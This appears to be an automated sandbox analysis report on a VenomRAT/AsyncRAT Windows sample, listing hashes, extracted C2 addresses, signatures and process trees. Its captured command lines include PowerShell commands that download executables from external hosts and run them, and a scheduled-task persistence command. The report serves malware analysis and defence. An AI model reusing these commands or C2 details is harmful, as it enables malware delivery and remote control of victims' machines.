Analysis
-
max time kernel
131s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 18:29
Behavioral task
behavioral1
Sample
0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe
Resource
win7-20240704-en
General
-
Target
0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe
-
Size
75KB
-
MD5
4fbd2fe9137a020947bcf47e878ad423
-
SHA1
b4a1d9dad685f12de91a22ffaad45134c7bc9128
-
SHA256
0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda
-
SHA512
dec1971e3a42404b864fdd408008ecd25ccdeb5556a82ba87e00beec24783fbec01c611eb85289dad9df73594789e7d9446ae97a29ba8897db16270fb8d20991
-
SSDEEP
1536:UGkU28PCCgMPMRk8Kt2OlY6H1bf/iG4CkzkKLVclN:U/UDamPMRk8v4jH1bfoCkDBY
Malware Config
Extracted
http://xcu.exgaming.click
Extracted
http://xcu5.exgaming.click
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
51.254.53.24:4449
51.254.53.24:16388
88.175.86.67:4449
88.175.86.67:16388
CPS
-
delay
1
-
install
true
-
install_file
carte CPS.exe
-
install_folder
%AppData%
Signatures
-
resource yara_rule behavioral1/memory/2292-1-0x0000000000FA0000-0x0000000000FB8000-memory.dmp VenomRAT behavioral1/files/0x0009000000016d89-21.dat VenomRAT behavioral1/memory/2684-23-0x0000000000E50000-0x0000000000E68000-memory.dmp VenomRAT -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0009000000016d89-21.dat family_asyncrat -
Executes dropped EXE 1 IoCs
pid Process 2684 carte CPS.exe -
pid Process 1704 powershell.exe 1756 powershell.exe 2272 powershell.exe 3064 powershell.exe 1616 powershell.exe 1376 powershell.exe 2344 powershell.exe 576 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2716 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2628 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1616 powershell.exe 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 1376 powershell.exe 2344 powershell.exe 576 powershell.exe 1704 powershell.exe 2684 carte CPS.exe 2684 carte CPS.exe 1756 powershell.exe 2272 powershell.exe 3064 powershell.exe 2684 carte CPS.exe 2684 carte CPS.exe 2684 carte CPS.exe 2684 carte CPS.exe 2684 carte CPS.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe Token: SeDebugPrivilege 2684 carte CPS.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 2684 carte CPS.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2684 carte CPS.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 2292 wrote to memory of 548 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 30 PID 2292 wrote to memory of 548 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 30 PID 2292 wrote to memory of 548 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 30 PID 548 wrote to memory of 1616 548 cmd.exe 32 PID 548 wrote to memory of 1616 548 cmd.exe 32 PID 548 wrote to memory of 1616 548 cmd.exe 32 PID 2292 wrote to memory of 2740 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 33 PID 2292 wrote to memory of 2740 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 33 PID 2292 wrote to memory of 2740 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 33 PID 2292 wrote to memory of 2920 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 35 PID 2292 wrote to memory of 2920 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 35 PID 2292 wrote to memory of 2920 2292 0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe 35 PID 2740 wrote to memory of 2628 2740 cmd.exe 37 PID 2740 wrote to memory of 2628 2740 cmd.exe 37 PID 2740 wrote to memory of 2628 2740 cmd.exe 37 PID 2920 wrote to memory of 2716 2920 cmd.exe 38 PID 2920 wrote to memory of 2716 2920 cmd.exe 38 PID 2920 wrote to memory of 2716 2920 cmd.exe 38 PID 2920 wrote to memory of 2684 2920 cmd.exe 39 PID 2920 wrote to memory of 2684 2920 cmd.exe 39 PID 2920 wrote to memory of 2684 2920 cmd.exe 39 PID 2684 wrote to memory of 2508 2684 carte CPS.exe 40 PID 2684 wrote to memory of 2508 2684 carte CPS.exe 40 PID 2684 wrote to memory of 2508 2684 carte CPS.exe 40 PID 2508 wrote to memory of 1376 2508 cmd.exe 42 PID 2508 wrote to memory of 1376 2508 cmd.exe 42 PID 2508 wrote to memory of 1376 2508 cmd.exe 42 PID 2508 wrote to memory of 2344 2508 cmd.exe 43 PID 2508 wrote to memory of 2344 2508 cmd.exe 43 PID 2508 wrote to memory of 2344 2508 cmd.exe 43 PID 548 wrote to memory of 576 548 cmd.exe 44 PID 548 wrote to memory of 576 548 cmd.exe 44 PID 548 wrote to memory of 576 548 cmd.exe 44 PID 2508 wrote to memory of 1704 2508 cmd.exe 45 PID 2508 wrote to memory of 1704 2508 cmd.exe 45 PID 2508 wrote to memory of 1704 2508 cmd.exe 45 PID 2508 wrote to memory of 1756 2508 cmd.exe 46 PID 2508 wrote to memory of 1756 2508 cmd.exe 46 PID 2508 wrote to memory of 1756 2508 cmd.exe 46 PID 548 wrote to memory of 2272 548 cmd.exe 47 PID 548 wrote to memory of 2272 548 cmd.exe 47 PID 548 wrote to memory of 2272 548 cmd.exe 47 PID 548 wrote to memory of 3064 548 cmd.exe 48 PID 548 wrote to memory of 3064 548 cmd.exe 48 PID 548 wrote to memory of 3064 548 cmd.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe"C:\Users\Admin\AppData\Local\Temp\0e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "carte CPS" /tr '"C:\Users\Admin\AppData\Roaming\carte CPS.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "carte CPS" /tr '"C:\Users\Admin\AppData\Roaming\carte CPS.exe"'3⤵
- Scheduled Task/Job: Scheduled Task
PID:2628
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp35A1.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2716
-
-
C:\Users\Admin\AppData\Roaming\carte CPS.exe"C:\Users\Admin\AppData\Roaming\carte CPS.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5a744410942262badb5c73e07c731bcb9
SHA17da21633a2513221d4f8c3637b0d53e434ba6cb8
SHA2565a74144bcff39c75c701a8252dd06fabdc9dfbac4074b3eb99c8e720c0795666
SHA5127201cfd007b5e4a9df6850be6e4775d4ae9fdd86d1402513fcab26d6f540135da882d8595b1725edbcf7631f47585c76cd0bba748490070180bda1547587fb5f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD553e5fd7fd4fad3712360ec9dfc74978b
SHA11afe4ffd70ff9a3a74c9beabe01fcd2b005062c6
SHA2567c698dc35e8b08a0aae27a293b7c5763200a8a7f35bda1aee35fb129fc430cc6
SHA512be30126d0bdb0372c2d7f2a60de9c9fc3882cc93b8fbd786d96768da5af0bc869d057f9e83f616417ef5acfb0aa10249651fb6dd212dfe4c1666c7bdc02d4e24
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
Filesize
75KB
MD54fbd2fe9137a020947bcf47e878ad423
SHA1b4a1d9dad685f12de91a22ffaad45134c7bc9128
SHA2560e2d07b49674f051f891007d781db4ae0d468286ce41309305ccce3dabf1abda
SHA512dec1971e3a42404b864fdd408008ecd25ccdeb5556a82ba87e00beec24783fbec01c611eb85289dad9df73594789e7d9446ae97a29ba8897db16270fb8d20991